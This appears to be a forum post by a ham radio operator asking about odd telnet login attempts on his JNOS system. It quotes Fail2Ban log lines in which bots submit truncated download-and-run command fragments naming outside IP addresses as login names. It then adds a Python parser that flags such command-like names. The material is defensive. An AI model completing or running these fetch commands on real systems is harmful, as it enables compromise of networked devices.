For those who monitor their logs, I've seen a spike in hack attempts to log in to my JNOS via telnet, only there is something odd regarding the username they're using when trying to log in.
I'm using Fail2Ban in combination with Shorewall, and my Fail2Ban jail rule caught these.
(Note the odd login names used in parentheses below.)
=======================
[Fail2Ban] jnos: banned 124.107.194.191
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login

[Fail2Ban] jnos: banned 119.93.93.191
Mon Jun 13 15:18:40 2016 119.93.93.191:43376 - MBOX (root) bad login
Mon Jun 13 15:18:41 2016 119.93.93.191:43376 - MBOX (46.183.217.145 -c ge) bad login

[Fail2Ban] jnos: banned 181.120.124.254
Tue Jun 14 15:26:20 2016 181.120.124.254:3982 - MBOX (root) bad login
Tue Jun 14 15:26:26 2016 181.120.124.254:3982 - MBOX (n2.sh -g 185.103.109) bad login

[Fail2Ban] jnos: banned 119.92.147.216
Tue Jun 14 16:46:50 2016 119.92.147.216:49692 - MBOX (root) bad login
Tue Jun 14 16:47:00 2016 119.92.147.216:49692 - MBOX (echo -e 'teot') bad login

[Fail2Ban] jnos: banned 119.93.93.103
Tue Jun 14 19:44:39 2016 119.93.93.103:50702 - MBOX (root) bad login
Tue Jun 14 19:44:43 2016 119.93.93.103:50702 - MBOX (08.67.1.175 -c get t) bad login
==========================
Anyone know what exploit someone is trying to probe for when using a login name like "n2.sh -g 185.103.109"?
Just curious if anyone knows the exact intent of what they're trying to exploit so I can research and reinforce as needed.
I suspect this is happening 44 system-wide to those with telnet options.
Bill Lewis - KG6BAJ
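As an added example (not part of the original post or of JNOS/Fail2Ban), here is a small Python parser for the JNOS MBOX "bad login" lines quoted above. It separates ordinary username guesses such as "root" from login names that carry shell syntax, option flags or IP fragments, which is the pattern the poster is asking about: a bot feeding a command string into the login prompt as if it were a shell. The classification heuristic and the sample log (taken from the post's excerpt, plus one constructed non-matching line) are assumptions of this example.

```python
import re
from collections import defaultdict

# One JNOS MBOX "bad login" record, in the format quoted in the post:
#   Tue Jun 14 15:26:26 2016 181.120.124.254:3982 - MBOX (n2.sh -g 185.103.109) bad login
BAD_LOGIN_RE = re.compile(
    r"^(?P<ts>.+?) (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+) - MBOX \((?P<user>.*)\) bad login\s*$"
)

# Heuristic (assumed here): a login name containing shell metacharacters, a ".sh"
# name, an IP-like fragment or an option flag is not a username guess but a command
# the bot expected a shell on the other end to execute.
COMMAND_LIKE_RE = re.compile(r"[\s;|&`$'\"<>]|\.sh\b|\d+\.\d+\.\d+|(^|\s)-\w")

def parse_bad_login(line):
    """Return {'ts','ip','port','user'} for a bad-login line, or None if it is not one."""
    m = BAD_LOGIN_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["port"] = int(rec["port"])
    return rec

def classify_login_name(name):
    """'command_like' for names that look like injected shell commands, else 'plausible_username'."""
    return "command_like" if COMMAND_LIKE_RE.search(name) else "plausible_username"

def summarize(log_text):
    """Group bad logins by source IP: attempt count plus every command-like name seen."""
    out = defaultdict(lambda: {"attempts": 0, "command_like": []})
    for line in log_text.splitlines():
        rec = parse_bad_login(line)
        if rec is None:
            continue  # not a bad-login record; skip
        entry = out[rec["ip"]]
        entry["attempts"] += 1
        if classify_login_name(rec["user"]) == "command_like":
            entry["command_like"].append(rec["user"])
    return dict(out)

# Sample input: lines from the post's log excerpt, plus one constructed line that must be skipped.
SAMPLE_LOG = """\
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (root) bad login
Mon Jun 13 15:09:36 2016 124.107.194.191:42351 - MBOX (46.183.217.145 -c ge) bad login
Tue Jun 14 15:26:20 2016 181.120.124.254:3982 - MBOX (root) bad login
Tue Jun 14 15:26:26 2016 181.120.124.254:3982 - MBOX (n2.sh -g 185.103.109) bad login
Tue Jun 14 16:47:00 2016 119.92.147.216:49692 - MBOX (echo -e 'teot') bad login
Tue Jun 14 19:44:43 2016 119.93.93.103:50702 - MBOX (08.67.1.175 -c get t) bad login
Tue Jun 14 19:44:44 2016 119.93.93.103:50702 - MBOX (kg6baj) constructed non-login line
"""

if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} bad logins, command-like names: {info['command_like']}")
```

Feeding the real JNOS log through summarize() gives, per source address, how many of the rejected logins were command strings rather than credential guesses, which is the distinction the Fail2Ban jail alone does not make.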